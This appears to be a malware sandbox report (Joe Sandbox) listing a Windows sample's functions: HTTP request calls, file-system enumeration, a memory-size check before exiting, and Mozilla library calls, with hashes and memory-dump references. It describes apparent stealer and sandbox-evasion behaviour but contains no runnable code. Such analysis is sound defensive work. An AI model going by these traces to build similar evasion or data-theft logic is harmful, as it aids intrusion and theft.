Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: f87a65bd7f2bdeccd8ee5274c2fb6938a28ee695dafdf49b50e952f4336e9bc4
Instruction ID: aa9c9616af9a199b5d6a3b0475cffa7feecc4a5f3d432c65ca752fcef13639ea
Opcode Fuzzy Hash: f87a65bd7f2bdeccd8ee5274c2fb6938a28ee695dafdf49b50e952f4336e9bc4
Instruction Fuzzy Hash: D1F05870A44209ABEF00ABA8DC0ABBE7B38FB48745F104915B502E21C1DFB05940DAA6

Function 009847B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00984839
InternetCrackUrlA.WININET(00000000,00000000), ref: 00984849

Strings

<, xrefs: 009847C9

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: 7dabbfa54b2eb9ba1984cdd190618c85cdc0048a385d8f9e82d4ad8644224103
Instruction ID: 544ac1f0fbdc0ee88d68879911aa4dbb202d93b3056bac7916483d72ec4b64be
Opcode Fuzzy Hash: 7dabbfa54b2eb9ba1984cdd190618c85cdc0048a385d8f9e82d4ad8644224103
Instruction Fuzzy Hash: D2213BB1D01209ABDF14DFA5EC45BDE7B79FB45320F108625F925AB280EB706A09CB91

Function 009951F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

Part of subcall function 00986280: InternetOpenA.WININET(009A0DFE,00000001,00000000,00000000,00000000), ref: 009862E1
Part of subcall function 00986280: StrCmpCA.SHLWAPI(?,0157E538), ref: 00986303
Part of subcall function 00986280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00986335
Part of subcall function 00986280: HttpOpenRequestA.WININET(00000000,GET,?,0157DCA8,00000000,00000000,00400100,00000000), ref: 00986385
Part of subcall function 00986280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009863BF
Part of subcall function 00986280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009863D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00995228

Strings

ERROR, xrefs: 0099521A
ERROR, xrefs: 00995273

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 2bcc76d2484512ce2ad955eb6f29874a6db83026c15f7aa7d57167e86e156183
Instruction ID: df2e49942feac6043992d80d0bd1fa80942ba4e68df4b263e91157b7f89e12c0
Opcode Fuzzy Hash: 2bcc76d2484512ce2ad955eb6f29874a6db83026c15f7aa7d57167e86e156183
Instruction Fuzzy Hash: 8411DA30910148ABCF14FBA8DD52BED7379EF94340F404568F81A5A592EF34AB06C7D5

Function 00981220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0098123E
ExitProcess.KERNEL32 ref: 00981294

Strings

@, xrefs: 00981233

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 803317263-2766056989
Opcode ID: c0b405f6e189f879fc8a5ecd167ea1f04cc74d384a1e8475c17b0f5adc5fff65
Instruction ID: 2ce648988dd0677b0d163b08a6207a4404bb5bb96604915c0d2cdf5547dc5a25
Opcode Fuzzy Hash: c0b405f6e189f879fc8a5ecd167ea1f04cc74d384a1e8475c17b0f5adc5fff65
Instruction Fuzzy Hash: DB011DB0D45308BBEF10EBE4CC4AF9EBB7CAB54705F248449E705B62C0DBB455468B99

Function 00994F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00998DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00998E0B

lstrcat.KERNEL32(?,00000000), ref: 00994F7A
lstrcat.KERNEL32(?,009A1070), ref: 00994F97
lstrcat.KERNEL32(?,015791D8), ref: 00994FAB
lstrcat.KERNEL32(?,009A1074), ref: 00994FBD

Part of subcall function 00994910: wsprintfA.USER32 ref: 0099492C
Part of subcall function 00994910: FindFirstFileA.KERNEL32(?,?), ref: 00994943

Part of subcall function 00994910: StrCmpCA.SHLWAPI(?,009A0FDC), ref: 00994971
Part of subcall function 00994910: StrCmpCA.SHLWAPI(?,009A0FE0), ref: 00994987
Part of subcall function 00994910: FindNextFileA.KERNEL32(000000FF,?), ref: 00994B7D
Part of subcall function 00994910: FindClose.KERNEL32(000000FF), ref: 00994B92

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: a2b29abe5d450a766c9524752273bff33c0352f3c260bf1e70249ac11c7915ee
Instruction ID: ad459eb2c787b16d113f19246adbd3f5d12367cd05b398d98e687bb7e940eed1
Opcode Fuzzy Hash: a2b29abe5d450a766c9524752273bff33c0352f3c260bf1e70249ac11c7915ee
Instruction Fuzzy Hash: 4D21987690020867CB54FBB4EC46FEA333CABD9704F004558B659D3181EE74AAC98BD2

Function 00990740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01579188), ref: 0099079A
StrCmpCA.SHLWAPI(00000000,015791F8), ref: 00990866
StrCmpCA.SHLWAPI(00000000,015791B8), ref: 0099099D

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 8424d155dd5666c7ed39164363bb475f1eaef6cdee2737c99471ce1a98b0387b
Instruction ID: bb9178bc464502819fb07d14e45e830bfdd63b5763bd4b05b883e7e35452e761
Opcode Fuzzy Hash: 8424d155dd5666c7ed39164363bb475f1eaef6cdee2737c99471ce1a98b0387b
Instruction Fuzzy Hash: 06914675A102089FCF28EF68D996BED77B9FFD4304F508519E8099B241DB309A06CBD2

Function 00990765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01579188), ref: 0099079A
StrCmpCA.SHLWAPI(00000000,015791F8), ref: 00990866
StrCmpCA.SHLWAPI(00000000,015791B8), ref: 0099099D

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: d205b7d4f8dc98590a5e9cba7ed8882adfbff0f1599b14554b86ac01214d743e
Instruction ID: 98804d8f64ddf52445102e5fe4677a174dc52a431eef5871315642d123d31cda
Opcode Fuzzy Hash: d205b7d4f8dc98590a5e9cba7ed8882adfbff0f1599b14554b86ac01214d743e
Instruction Fuzzy Hash: DB812575A102089FCF18EF68D996BEDB7B6FFD4304F508519E8099B251DB309A06CBD2

Function 009970D0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

memset.MSVCRT ref: 0099716A

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0099718C

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 4047604823-4138519520
Opcode ID: 83908801d96201a3ff29ccb7ead21b80d5e6f475bca90e7b75c5f5fca6708960
Instruction ID: 4c4510a2be23a4468b3fd00fa920d5e252e315f958cb50fd7cfd6a38fb3f73c3
Opcode Fuzzy Hash: 83908801d96201a3ff29ccb7ead21b80d5e6f475bca90e7b75c5f5fca6708960
Instruction Fuzzy Hash: FF5140B0D142199BDF24EB98DC86BEEB774EF94304F104498E11576181EF746E88CF59

Function 6CC93060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CC93095

Part of subcall function 6CC935A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CD1F688,00001000), ref: 6CC935D5
Part of subcall function 6CC935A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC935E0
Part of subcall function 6CC935A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CC935FD
Part of subcall function 6CC935A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC9363F
Part of subcall function 6CC935A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC9369F
Part of subcall function 6CC935A0: __aulldiv.LIBCMT ref: 6CC936E4

